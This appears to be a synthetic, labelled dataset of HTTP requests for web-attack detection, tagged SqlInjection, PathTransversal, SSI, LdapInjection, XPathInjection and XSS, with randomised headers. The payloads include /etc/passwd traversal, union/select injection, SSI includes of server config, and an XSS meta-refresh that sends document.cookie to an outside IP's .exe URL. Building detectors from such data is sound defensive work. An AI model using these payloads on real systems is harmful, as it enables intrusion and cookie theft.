If-None-Match: "FNgOUp_BeNPShhitxQ"
If-Range: Thu, 08 May 08 19:56:09 UTC
Max-Forwards: 3
MIME-Version: 4.1
Pragma: at='lribde'
Authorization: NTLM ZU1ta28zbnVhaWVidXRzZWVNbmNubjVTZXhzYW9oaWFleGVuYU1vdEE=
Range: 52-067988,48957-
Referer: http://www.hteV.st/usrd/ge45sobb/is2ao5/rnsniha.asp
TE: gzip;q=0.6,trailers,deflate
Trailer: Via
User-Agent: Mozilla/4.3 (Windows; U; WinNT 1.6; jo-Da; rv:7.6.1) Gecko/05739417
UA-OS: Mac OS X
UA-Pixels: 274x803
Transfer-Encoding: compress
Upgrade: ensibi/4.7, tetheo/8.4, iarhfi/9.3, lh4tm/2.6
Warning: 120 183.198.212.10 "5hoema" "Mon, 27 Nov 06 04:28:46 GMT"
X-Serial-Number: 373561345188
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aealmeaEotajcz0=367&Eo4e4=aid&mnareeer=sKnsyweesOu(&Tdb.include=53767&Mdts=2msysEoniE7o&aulP68osvDpdoe=\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html&edetsei=rgSv2uGMY@X&3nSesuoon=63&del3HhDevnEn=orth8ehnriulmireplaceoirnode&ssees8m7tvch=|d<xtof~tteufn<pt&eAnezriuIda=bdiv

End - Id: 36259
Start - Id: 41548
class: SqlInjection
PUT /uhnnMla7gosnorgfhc/eatO5thS05/idZ7NlDxi5fa.html? HTTP/1.1
Content-Length: 156
Content-Language: m
Content-Encoding: deflate
Content-Location: /qo7A/uaTm/e3pty2v/1wusgle.css
Content-MD5: dHpzZWRsMGJudGVwYWk3ZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 20 Dec 08 22:31:18 UTC
Last-Modified: Wed, 18 Jan 06 03:55:45 GMT
Host: www.q5nscha.ch
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 141.137.190.71
Cookie: rLennialE=rJc4iROAL
Cookie2: $Version="56"
Date: Tue, 20 Jan 04 07:39:53 GMT
ETag: W/"I-1BCZuVOcSp3nVg"
Expect: 100-continue
From: gJohs0a@amewNlgh.cz
If-Modified-Since: Wed, 19 Dec 07 23:29:28 UTC
If-Unmodified-Since: Wed, 26 Sep 07 12:08:25 CET
If-Match: *
If-None-Match: "7ewjcuuVN8q3s@3rEJ"
If-Range: "BqgqwkFJK2-68UUUyw4e"
Max-Forwards: 6
MIME-Version: 6.1
Pragma: 7wtaiorh=tdpcymln
Proxy-Authorization: NTLM VGlESGVlZTFrMWFGNDJmbTltdDVMbzdzcmJ0dGU1d2hvaGVO
Authorization: Basic Mmx3dGF3ZWE6aGVnc0U=
Range: 3-867291
Referer: /I5ieetn/Vwedhnee/fnwbin.css
TE: trailers,chunked
Trailer: Expect
User-Agent: Mozilla/7.8 (X11; U; Linux i386 5.3; ew-jo; rv:8.4.9) Gecko/30312581
UA-CPU: StrongARM
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8585x974
Via: Aayf/5.0 www.iehf0p6t.htm, 8.0 www.yfta9ecj.css, HTTP/3.7 www.6ltti.jpg
Transfer-Encoding: gzip
Upgrade: iaDf6/1.7, ftqty/7.0, ewiv/6.4, asctho/8.1
Warning: 751 www.Lnbf.js "segwzwse" 
X-Forwarded-For: 84.75.227.228
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

oEa5oArvf9brOt=unpassthru9hman+piu&eierer=28220&blh=089&seteo8w=or+++++0%3C%3E%28select++count%28*%29+from+++yhio%29&U%unZ3=8rwr%5D9iztt%24eoa&eh1oodgteg=89

End - Id: 41548
Start - Id: 45227
class: PathTransversal
GET /./? HTTP/1.0
Host: 173.81.139.230
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: macintosh;q=0.3, x-mac-cyrillic;q=0.5, euc-tw, euc-jp;q=0.5, windows-1257;q=0.2
Accept-Encoding: compress;q=0.2
Accept-Language: h-rs2oTam, 3seimhn6-gmDtwx8e;q=0.4
Cache-Control: no-cache
Client-ip: 98.132.36.144
Cookie: co2toe1=so
Cookie2: $Version="1"
Date: Tue, 10 Nov 09 21:24:21 GMT
ETag: W/"bOlPDswTjl-nC3LOx"
Expect: hslN
From: sgrttcno@xhaofa.gov
If-Modified-Since: Sun, 09 Apr 06 13:49:28 CET
If-Unmodified-Since: Mon, 10 Apr 06 05:19:14 CET
If-Match: "8NKHrVu-PltzuDw"
If-None-Match: *
If-Range: "sMdrYFbvp5ulpst3DN"
Max-Forwards: 92
MIME-Version: 3.6
Pragma: a2tot=rebrch
Proxy-Authorization: Digest qop=evai40
Authorization: Basic RWVldzpvOHRlcw==
Range: -01750,762-,10389-0
Referer: /c2dp55r/adbmtka/AttiseTf/LNztx/mzzbxeh.mp3
TE: trailers,chunked;q=0.2,trailers
Trailer: Expect
User-Agent: Mozilla/0.5 (Machintosh; U; PPC Mac OS X 8.0; ne-un; rv:0.7.6) Gecko/66959483
UA-CPU: x86
UA-Disp: 675,5988,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2272x045
Via: 9.4 150.248.201.188, 5.6 179.191.146.1
Transfer-Encoding: htmn; Em6p=0aze
Upgrade: ttt5/9.0, laolhr/8.9, geei2/4.3
Warning: 716 159.251.225.90 "mlwsSDTsqhrp0o8th5ez" 
X-Forwarded-For: 90.180.246.61
X-Serial-Number: 706890452941318
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45227
Start - Id: 39339
class: SSI
GET /eq6aeoaxo/e0/jeWlcgytaEbl/6IR/z7_@Pu1XcNv3/shsrwq.jpeg?nte=c%40c0%40txT-P&plncwio=%3C%21--%23email+fromhost%3D%22www.aooyFj.com%22+tohost%3D%22mailbox.e2tro.com%22+message%3D%22uylkn+hiosoSi+tqrcesne+cek%22+fromaddress%3D%22tqnrtn.com%22+toaddress%3D%22nnue.iscN.com%22+subject%3D%22eh%22+sender%3D%22l1ol.com%22+replyto%3D%22tiyeoa.com%22+cc%3D%22eu%22+inreplyto%3D%22de0Hu+ntnd+yocjnn%22+id%3D%22eDoemail%22+--%3E&neeewEmiaes=TotcntlHzlm+%3Aa&sock_stream5jnFB4QO=rhrrugdsfztir&mdag=%27union&r0D2tbmoefu=-5&ayitje=boot.init%3En6grmeczsgheefnes&et=19465530&bkrltsqlshnf=654&sgega6glona3rnl=rcreeNec+A&_HND=aeyfla9oxSasextermt&rRzrom=aE&immtpAbtioeentu=540501&tTfneadnfEtb5m=3pssiIis5aw+%27D HTTP/1.1
Host: 45.235.180.249
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8, utf-7;q=0.2, windows-1254, isiri-3342, macintosh;q=0.2
Accept-Encoding: identity, deflate, gzip;q=0.0, compress, identity;q=0.3
Accept-Language: aaehn-Lmtblde, ef-x;q=0.2, Rhs3f-orgeZilx;q=0.9, aih-hyauZ, ts8i2ei-erNmyae
Cache-Control: max-age=2
Client-ip: 153.213.53.71
Cookie: LMJ0BN6htpassmV=h"@"n;uotthoe=gensnooSnxtermteE;r6miife=kpd;theaTizCkeyuL=a\metxtr2v;eUjennhm=6;pneentdi7lc=rm\u
Cookie2: $Version="998"
Date: Sun, 13 Aug 06 10:23:47 GMT
ETag: W/"UfE2ce@UXAHx12IVp"
Expect: utbrf
From: tuHdgsLz@bmsemyoDde.biz
If-Modified-Since: Thu, 03 Apr 08 13:16:42 GMT
If-Unmodified-Since: Tue, 01 Jul 08 02:42:00 UTC
If-Match: *
If-None-Match: "3mpmfDyxbeeWbZR"
If-Range: Mon, 09 May 05 14:44:23 UTC
Max-Forwards: 9987
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: NTLM dDF5cXlCY2FlcnMwZ3RveXJlbHQ4b0Vhc1R5cmhvaGFvaGU4c2Q=
Authorization: NTLM b3RlZWw1dEVlZWVydVJyWWduQ2JhbjJ0Y3JubHJuZXNuZTIx
Range: 422767-,0924-,61697-47592
Referer: /yeadfey.htm
TE: chunked;q=0.7
Trailer: Connection
User-Agent: halVvndiprd9dds
UA-CPU: Sparc
UA-Disp: 879,3811,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 3324x441
Via: 1.9 116.134.112.243, 8.5 114.203.73.248:11, 9.2 www.ortnei.jpg
Transfer-Encoding: compress
Upgrade: 5lnxa/4.9, sonsya/6.3
Warning: 330 59.99.71.16 "lsngqsttrt0oajgUtrih" "Mon, 05 Mar 07 23:21:49 CET"
X-Forwarded-For: 135.206.207.129
X-Serial-Number: 802337450581
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 39339
Start - Id: 39106
class: LdapInjection
POST /huWI/6esHoee0s/d8oiN9mhS0qsb@i/2emcIEJpR/wJmochaWMFn5dD9/i0yddyYLQoVlGHVj/etudag3sUmpnqtybqsH/uieN/XdperlldAJJrmn6.swf? HTTP/1.0
Content-Length: 288
Content-Language: le
Content-Encoding: compress
Content-Location: /tnhoaa/oloEoi/t2twln/3rsro.sh
Content-MD5: dU1kcmVjTlJjZW5saWl0eQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 16 Jan 08 20:00:32 GMT
Last-Modified: Fri, 24 Sep 04 05:17:33 GMT
Host: www.eier.org:80
Connection: keep-alive
Accept: application/*, text/*, video/quicktime
Accept-Charset: utf-8;q=0.0, ks_c_5601-1987, shift_jis, iso-10646-ucs-2
Accept-Encoding: *
Accept-Language: arifb-Y;q=0.3
Cache-Control: no-cache
Cookie: tnenddoloTdlouo=5um)(&(objectClass   = l1qi*);5linkgUMt=aL@;itLoyvgi=Avgd3STettdy0dnanj;eO=rgpg6gosciiunwtoes
Date: Fri, 16 Jun 06 18:13:43 UTC
ETag: W/"DHiphaSXsaneHf2llz_"
Expect: n8sci=pwfh
From: raspuv@ntperaoi0.com
If-Modified-Since: Fri, 11 Dec 09 03:54:19 UTC
If-Unmodified-Since: Sat, 24 Dec 05 20:44:01 CET
If-Match: "W-mbiRB3S@04PD1PumC"
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 4.0
Pragma: no-cache
Authorization: Digest realm
Range: 9-,-9509
Referer: http://hlsm.be/ynalonoN/arda/aene1hat.gz
TE: deflate;q=0.1
Trailer: Pragma
User-Agent: Mozilla/5.2 (Windows; U; WinNT 1.4; js-9m; rv:4.4.2) Gecko/73605705
UA-CPU: StrongARM
UA-Disp: 560,8343,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0653x3308
Via: 8.0 www.faTaaI.js:9, 3.4 242.238.40.135, ilHd/2.7 133.227.163.198
Transfer-Encoding: identity
Upgrade: rz2/0.2, imn/2.2, v538eq/0.4
Warning: 318 www.g7bg.png "aa37meuh" 
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

etnsmeraai=oh&Snyr1t=4609&8.Newvbscriptdivsams0sock_streamI=oDSrcHMtd&eIjhrn=2542&nhnumidtAmhand=Eusa6Js6twa&basie=rtel&jeoieo=nndrop-hps0aTe4a6|thj:id&TyrecehtLeidd=eecrcs3pmA5kisa&axeLomSobuco=eTt%itfoe6oeat&a3gp=cWrgNbh&tsige5vostl=Znbejt&pn=4505&wkk2j3kB73= bt7zs &l8q_D=oe~gh

End - Id: 39106
Start - Id: 39246
class: SSI
GET /59XyeautoexecQKS/uYUkmG4EemXl.asp?Aprocessing-instructionbWservicesP9ws=%3C%21--%23email+fromhost%3D%22www.uiiuioai.com%22+tohost%3D%22mailbox.hcixr.com%22+message%3D%22nbana+ho05yb+Eyyl8ep+eriohe%22+fromaddress%3D%22roAa.com%22+toaddress%3D%22nAans.red.com%22+subject%3D%22hhy%22+sender%3D%22xt.com%22+replyto%3D%22egeki.com%22+cc%3D%22nr%22+inreplyto%3D%22ae+ea19+owa%22+id%3D%22seadmail%22+--%3E&3abun=etszweEboi&anpHeronqskn=aAYsaWs&fNo=9618525&Mdroij=%5D%3B135cy+&-raccess_logE=%5Duhs&hIea=art%5D&hrnHi4siovsuma=ihtpass%29npta+0&irvjbtj5oo0jNt=oonreev&wneunion=vRrptys4a&46reIsgtsslx=3&grwhso5e=059&zRr1=e++%3Eu%27+rnodegnht+ism-p&r8eYsudGlu=up87OZH HTTP/1.1
Host: 131.188.147.230
Connection: keep-alive
Accept: audio/basic;q=0.9
Accept-Charset: *
Accept-Encoding: compress;q=0.4
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 240.199.60.134
Cookie: auebhRA4mink=616884075;nezeiontcr0noi=2329257640
Cookie2: $Version="7"
Date: Mon, 10 Nov 08 18:10:44 GMT
ETag: W/"jRsIL1CqmGtIEhLf-xD7"
Expect: 100-continue
From: ogpe@eKhmc.uk
If-Modified-Since: Wed, 27 May 09 06:34:13 GMT
If-Unmodified-Since: Mon, 12 Jun 06 09:09:42 CET
If-Match: *
If-None-Match: *
If-Range: "QEelm2mgLh-UbRfP0"
Max-Forwards: 224
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic bFN4ZG5mOjZyZVlhZQ==
Authorization: NTLM c250cnlGYWlvdVJaZ0VxdHM4Tm9yZnJ0ZDBoZm9sdGVm
Range: 5-9725,-6683
Referer: /cdhedti/t4ll.js
TE: deflate,trailers,gzip;q=0.7
Trailer: Range
User-Agent: seoietiehn (0e5Ypt; nuvkGVsM; t2e20jMuh; 6Rtd1vq; 9t7xsbjU)
UA-CPU: MIPS
UA-Disp: 3930,8741,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 833x510
Via: FTP/8.2 69.159.239.55
Transfer-Encoding: deflate
Upgrade: ueiyd/3.1, tac/2.4, eiz/0.3, isofl/2.9, eutR/4.6
Warning: 674 87.251.118.45 "eumooyaaYheigmldr" 
X-Forwarded-For: 252.9.253.184
X-Serial-Number: 2940498240401251
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39246
Start - Id: 36014
class: PathTransversal
GET /nfACnI/nnehaATwasmihd5xrgd/nxaH6wbF.ht@c-tB/d7geoilsane/nEYr5btrC/sd55T2zZO.VRCo2Ej.gif?el=hDwgK.nxHD&nchir68e7in=sikcerjm&Vw4ZHLVkoptNc=%3F08l%25&uCehbll=i%3FswaoWA&caSEicdrk=enem%3D5&nOiA59u=yw&g6e=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Fyo.bat&adminUUx=%3Cvq5 HTTP/1.0
Host: www.dieett.fr
Connection: keep-alive
Accept: application/*;q=0.8, image/gif
Accept-Charset: iso-8859-9;q=0.5, koi8-r;q=0.6, x-mac-arabic, iso-10646-ucs-2;q=0.8
Accept-Encoding: 
Accept-Language: sliee-erpt;q=0.7, so-so2tnNl3
Cache-Control: only-if-cached
Cookie: rbxepnbztteeee=0hehmwriVe6aHi;jaajAeEl=9855173220;yehniun=s;InupdatekliZd1XeK=ro 1;gyne=hAh6Ssp;eat=3kt
Date: Thu, 19 Oct 06 05:52:44 GMT
If-Unmodified-Since: Tue, 18 Oct 05 23:42:42 CET
If-None-Match: *
Max-Forwards: 63
MIME-Version: 9.9
Proxy-Authorization: NTLM bmFiRXRsbmlnZXplYWxzTml1bWVlYWVyYWFzdHNkZDh4YTE0bmo=
Authorization: tbnei oiec=eotufe
Referer: /A8feh.wmn
TE: trailers,trailers
User-Agent: Mntsh (nZ5Qme.m3; mlvHfxJvg; eT8GFxGV; r70byrZUJ)
Via: FTP/1.1 116.127.209.75, wtesk/0.1 www.dtoimob.png, 0.0 www.otmFnawr.tiff
Warning: 902 48.219.54.198 "etIGqadina5ca" 
----: ------------------

null

End - Id: 36014
Start - Id: 39543
class: SSI
PUT /URadUFffjolinkrrW/2MF0xzNS.dVjokeKLHfp/waryeDhfan/ooeovecai.jpeg? HTTP/1.1
Content-Length: 201
Content-Language: on7o,ieetpyaw,Ye
Content-Encoding: gzip
Content-Location: http://tiEvlie.fr/aZeesrel.gz
Content-MD5: YXJybDdzdHBnZWVTOWVudA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 07 Jan 06 12:10:21 CET
Last-Modified: Sat, 03 Feb 07 16:39:11 GMT
Host: www.tocliu.fr:27
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: utf-8, cp-950
Accept-Encoding: gzip, identity
Accept-Language: 1eTblwe-qUDrz;q=0.3, sw6des-it8t;q=0.4, ri-3jiTe6Ro;q=0.9, heie1Wz-n;q=0.3
Cache-Control: max-age=66
Client-ip: 94.165.84.44
Cookie: heyhatsL=81493
Cookie2: $Version="21"
Date: Fri, 01 Jul 05 07:54:04 UTC
ETag: "Fy7oJSR8Kvcmx6kiLh"
Expect: tkvh
From: nsnhcot@wollyC.st
If-Modified-Since: Tue, 27 Jan 09 12:01:10 UTC
If-Unmodified-Since: Tue, 28 Dec 04 19:24:25 CET
If-Match: "@zy.mKCE-5ORFJEI1Ve"
If-None-Match: "Wo2ebZMJidzslMq"
Max-Forwards: 9
MIME-Version: 1.1
Proxy-Authorization: NTLM aXJuaVNqZmxvZTQwRTNUYWJvY29vVWFzZDJ1SGgzbHNz
Authorization: NTLM dGNkMjRpd3NyeGU0bnM0aXRic3R5TmlhZWFueWJpdGFueQ==
Referer: http://klsi.net/oooduree/Aifkbsnh/etii/dh2kmscn/6ej7dot.js
TE: trailers,gzip;q=0.9
Trailer: Authorization
User-Agent: Mozilla/3.3 (Windows; U; Windows NT 3.3; aa-ce; rv:1.0.4) Gecko/77508980
UA-Disp: 0663,736,8
UA-OS: Windows 95
UA-Color: color8
Via: 0.0 138.99.195.173:79
Transfer-Encoding: compress
Upgrade: ibhi3u/4.0, tAAin/1.9, ofae/4.1, dojnr/5.2
Warning: 543 www.ydocee8.html "biTseoerdCyyr4oaht" 
X-Serial-Number: 11507528452920010282
----: --------------------

pienoseHrn=ootbinT&eit=%usnhoTron 6ds&5o=kIfRn&CebfnatNe99e=:oallh0gpositionaf&s8ugsb=<!--     #include    virtual="/etc/httpd/httpd.conf"   -->&saL5Rmr=Ht0qet&k5ha0s6cf=xp_srrh

End - Id: 39543
Start - Id: 41861
class: SqlInjection
GET /ureplacereplaceIghT/eIo.CeYCw-/rprD1Jbh5@_ml5gP/eTR.5g-dCABFEur/qxehNi07gobytsedt/cei2bstsorIa0rxerel/libnwgetatm.2@Edocument.php?at=%27+++OR++++%276osD%27++++LIKE+++%27aze%2525&trs=U+t3e HTTP/1.1
Host: www.moraa.net
Connection: close
Accept: audio/x-wav, application/*
Accept-Charset: iso-8859-5, windows-1251;q=0.4, x-mac-chinesesimp;q=0.9, cp-950, euc-jp
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: max-age=76
Client-ip: 207.34.131.216
Cookie: mao7ngTeet=s8q3L;rba=567879;ncea=1 '1?gooakat eo;hMd_xBWBk=8v6H@;mewebbich=ni4rsoWia1wks;he=nsIne$nicz 
Cookie2: $Version="72"
Date: Wed, 05 Sep 07 23:19:04 GMT
ETag: "a2V9IycN6MWKRF29Nv"
Expect: hbnaeaon=kuEqf
From: hth8n7i@4gf4.de
If-Modified-Since: Thu, 30 Apr 09 10:46:23 CET
If-Unmodified-Since: Sat, 06 Sep 08 03:08:14 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7325
MIME-Version: 7.2
Pragma: j=lxU4
Proxy-Authorization: 9e2te epmr=aedBepse
Authorization: Basic aDNpZWQ6THF0VDE0bmc=
Range: -521,-331719
Referer: http://www.titoe.net/ntWa2/noklig.cfm
TE: gzip;q=0.5,trailers
Trailer: Expect
User-Agent: wcVms1os1nVs
UA-CPU: PowerPC
UA-Disp: 0650,9249,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 5914x483
Via: FTP/6.8 www.Qnreyt.htm, HTTP/2.8 224.17.178.85
Transfer-Encoding: gzip
Upgrade: i1en7/5.4, wsdt/7.7
Warning: 532 103.218.114.157 "eqF8dbfeC" "Sat, 29 Jan 05 05:14:55 CET"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 8017409
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41861
Start - Id: 48436
class: XPathInjection
GET /tgn8tcpprleobott/NkR/rotts9ErcSE/3theCyenc4coiid/n.m8WViduFgjNxhq/abKxNYVMF.jpeg?OxWr=n6dkc&nlaonrdhlfrgrdI=+ehg&ndjXrle2ntysIte=%3EirpstnypoLoiaa3gRr+e&oe=401043974&erser6dvmmap9sy=a8adminlrglfp&6e5HeA=fdzo&9xbc=31977870&ianoiqroeonmssr=8171&onsennceFwtexho=s%3A%27Tl%2Bpd%25 HTTP/1.1
Host: 38.64.142.147
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-1;q=0.9, windows-1251;q=0.6, isiri-3342, x-mac-roman;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=846
Client-ip: 96.49.30.97
Cookie: fbGtzJVC.9_6=sfaoe'   or path/child::node()[position()=N]     or    'r8mun'    = '
Cookie2: $Version="81"
Date: Tue, 24 Apr 07 01:15:08 UTC
ETag: W/"1xV4GK7LTXGJbC."
Expect: 100-continue
From: eeilci@sjer8E8kd.it
If-Modified-Since: Thu, 13 Apr 06 15:25:27 CET
If-Unmodified-Since: Wed, 08 Jun 05 17:51:18 UTC
If-Match: "i6-QCmwaiR1ICvU9wj7"
If-None-Match: *
If-Range: Tue, 05 May 09 14:18:51 GMT
Max-Forwards: 0
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: nAes slnW=i4rum
Authorization: Digest nc=A2Bae15C
Range: 849-343947,4-,-41
Referer: http://d1ejl9.biz/8si8iL/zrOydthf/h9ldel/o4aaudn.asmx
TE: trailers
Trailer: Max-Forwards
User-Agent: piEnjdtb (nNq.3oA; 3Q0dl.; npzK9Lic; r6nXCVi; 5@JscmMu6m)
UA-CPU: x86
UA-Disp: 1980,9554,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 736x8467
Via: 6.7 www.eaaOx.html, HTTP/3.1 148.55.234.135, 9.8 167.246.103.198
Transfer-Encoding: compress
Upgrade: 7eaeH/4.4
Warning: 045 18.217.71.232 "nyeawytx" "Sun, 22 Feb 09 19:54:14 UTC"
X-Forwarded-For: 110.20.49.195
X-Serial-Number: 72505509586520475134
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48436
Start - Id: 47780
class: XSS
GET /nidyaoepeoirtdi/ctsxtlr75tt2ao/m9phZ_CX/tnir/i9oG@RpKy/mQbJ5GUXCYK@RI4-_/qsr/xHRNzkM98ZRFff-9iH_/rcp9HZinsert/esrawam/g6I2zblf6swa2sdls/ow.asp?ezdusabv4id=solg3cste&nullopenywv1z=em4nliteseshnn&iEme2Eg64=6399682778&h16i4W55alte=8884506&XhVV=doeceiiaccaty&ksrpqszse=uIttegt&gandclstsor=s+b+eibe0o&wp-jP-_=7&jbEw=mmohpak8wgorsoPstio&tawtilit6hg=%3Cmeta+++++http-equiv%3D+++%22+refresh++++%22++content+%3D+%22+0%3Burl%3Djavascript%3A+++%5Bwindow.open%28%27http%3A%2F%2F201.107.160.9%2Fta.exe%27%2Bdocument.cookie%29%3B%5D++%22+++%3E&N17t=p8%3Beiracopy%7Cea&grrt5dlfh83qeg=it0inIwsu1e&9shHrmaesEeioal=Thvuspc4ecnieprocessing-instruction HTTP/1.1
Host: 90.136.169.97
Connection: close
Accept: audio/*, audio/*, text/*;q=0.7
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: mesxa-wren0eYr, p-etLns4e, tGO0-se
Cache-Control: auksx=a4
Client-ip: 41.211.153.179
Cookie: egn1hliaee=uyivht9ahiIia4;iGmHo=snDbnrdm
Cookie2: $Version="49"
Date: Sat, 27 Jan 07 15:15:07 UTC
ETag: W/"llM-xJQU9H5XeIPnwx"
Expect: tese=ojdN1;xeEsf
From: ychumrg@eeAsehi.cz
If-Modified-Since: Fri, 02 Sep 05 23:28:25 UTC
If-Unmodified-Since: Thu, 03 Dec 09 20:04:53 GMT
If-Match: "RoRP6P46gnywWNY.S"
If-None-Match: *
If-Range: Fri, 09 May 08 03:24:48 GMT
Max-Forwards: 4
MIME-Version: 7.4
Pragma: t7=x7
Proxy-Authorization: ynhmte fnet1=f4tno
Authorization: Digest nonce
Range: 2672-661117
Referer: /xp7n/nJeeh9ea/ajmede.gz
TE: deflate;q=0.1,trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/2.6 (compatible; Konqueror/6.8; Open BSD i386; zxohsmoeeR; iyfui4; uligese)
UA-CPU: PowerPC
UA-Disp: 1153,3781,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2539x540
Via: 0.3 35.86.27.8:05
Transfer-Encoding: identity
Upgrade: ioe/1.5, oaei/8.3, ehtv/0.6
Warning: 119 www.u4avcao.jpeg "eaDh3tssiseettoa2" "Mon, 21 Aug 06 21:05:07 UTC"
X-Forwarded-For: 208.82.57.120
X-Serial-Number: 47690533150312984482
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47780
Start - Id: 37270
class: LdapInjection
GET /nL0Fu6dP_/sE7Xj7KLktqEl3tLOuWY/woe/FS/d5EOCS7_/gvdre1nhaqrdksutj/mc8naiaee/aphouanIuCSNspz/o6mbaY3rW9cXsWA.oBLQ/input688tG9.jpeg?soD=986%29%28%26%28objectClass%3D6tAt%29%28%7C%28sn++%3D++ti%29%28cn%3DLwh++++J*%29%29&taBs4oO1aeth=Ouert78yn%3BtilO HTTP/1.0
Host: www.tcecsh.be
Connection: nQhepge
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-transform
Date: Sat, 26 Apr 08 24:27:00 GMT
Max-Forwards: 40
Authorization: Digest cnonce="hunp8tD"
Referer: /algozqur/rbcaEa/nurnerC/dehrhm/thj8di.tar.gz
TE: trailers,chunked
User-Agent: Mozilla/7.6 (Windows; U; Win98 7.0; 7e-ji; rv:9.2.0) Gecko/18699098
UA-CPU: PowerPC

null

End - Id: 37270
Start - Id: 45836
class: PathTransversal
GET /AmestgeI1stn/rEnQdFmAIw/VRAunionSy/16/e0llhrSl/cgpn6nuh9e/p3Hcbfhaehctcercp/dwu6gmdhc1ot1wsemp.js?NeeHo=%5Cautoexec.bat HTTP/1.0
Host: 249.65.219.217
Connection: close
Accept: text/*;q=0.7, audio/*, audio/x-wav;q=0.5
Accept-Charset: *
Accept-Encoding: deflate;q=0.0, identity;q=0.6, deflate
Accept-Language: *
Cache-Control: min-fresh=7233
Client-ip: 103.226.207.78
Cookie: Vgtmptpwety=enyiEAx2fe;meseLbhlrF1g=02106;aPax= ezea'lEc&a$e
Cookie2: $Version="476"
Date: Sat, 01 Aug 09 15:18:49 CET
ETag: "pcuOXffDgOU2k3R9Y"
Expect: tons32
From: ix4abcph@mnt9ssu.gov
If-Modified-Since: Sun, 06 Aug 06 08:42:43 UTC
If-Unmodified-Since: Thu, 15 Sep 05 05:10:13 UTC
If-Match: "ziEfDRGDlKnB.7Xb_W"
If-None-Match: "zXW-D.D90nzMt8qQ"
If-Range: *
Max-Forwards: 818
MIME-Version: 9.7
Pragma: trtHmoE=olnt1oma
Proxy-Authorization: Digest uri=http://www.ncrl8sh.ch/2nled.asp
Authorization: Basic b3llM2loamk6dGUzb3Rhcw==
Range: -885841
Referer: /mre6trwr/BSa9iamr/gmtsIod/eatangd/sSOrhrmM.zip
TE: gzip;q=0.0,deflate;q=0.8,gzip;q=0.3
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.4 (X11; U; Open BSD i386 9.3; hi-ey; rv:2.2.8) Gecko/39333039
UA-CPU: PowerPC
UA-Disp: 7854,570,8
UA-Color: color8
UA-Pixels: 861x425
Via: 9.8 245.231.3.126, 7.5 www.asb3t.jpg:55428
Transfer-Encoding: ts0lte
Upgrade: idie/5.7, dunk/6.1, sib/2.4
Warning: 945 4.66.74.136 "n7nhehqedexmd" "Sat, 22 Aug 09 11:03:47 GMT"
X-Serial-Number: 25397478987579
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45836
Start - Id: 49734
class: XPathInjection
GET /r_oQjXp3EQxeAN@c/2jlogSfUtqUobBB/tMxSF@IJznTJ3XHQR18/scriptr/9replaceZOkDZdU/hjiexrwm9Jrtyaos/cM/7sVxZme@jFB34B0/6roeinrpieth/nyPGhE/m7etLeE.mdb?0tMbtis=265&ma=pdivreplace&kft=0O%2Fncm&shhheze85E00w=7&fjHhedjitaTtr=vn%3Cai6readdsTe&dde=nph-dsh%3A&tchthi=osneejsosLHmeccyw2&mocha7bAv6qG=efj06dx%27+or+oe%2Fle5n%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D8%5D++or+%27rrbh%27+++%3D++++%27&dsbbib6fy4y=lErtcpsurmpe&eed8thbpoymlh9=967&dehdhk3adcShn=59XFHjQuLg&ieIiexamhix=ss%2Bp HTTP/1.0
Host: 228.120.77.85
Connection: close
Accept: text/*;q=0.2, application/rtf;q=0.5, application/*;q=0.6
Accept-Charset: iso-2022-jp;q=0.9, windows-1252, big5
Accept-Encoding: gzip, deflate, deflate, compress;q=0.5
Accept-Language: qNafto-wqs;q=0.0, xovhEu-ztlde;q=0.4
Cache-Control: max-stale
Client-ip: 24.134.122.55
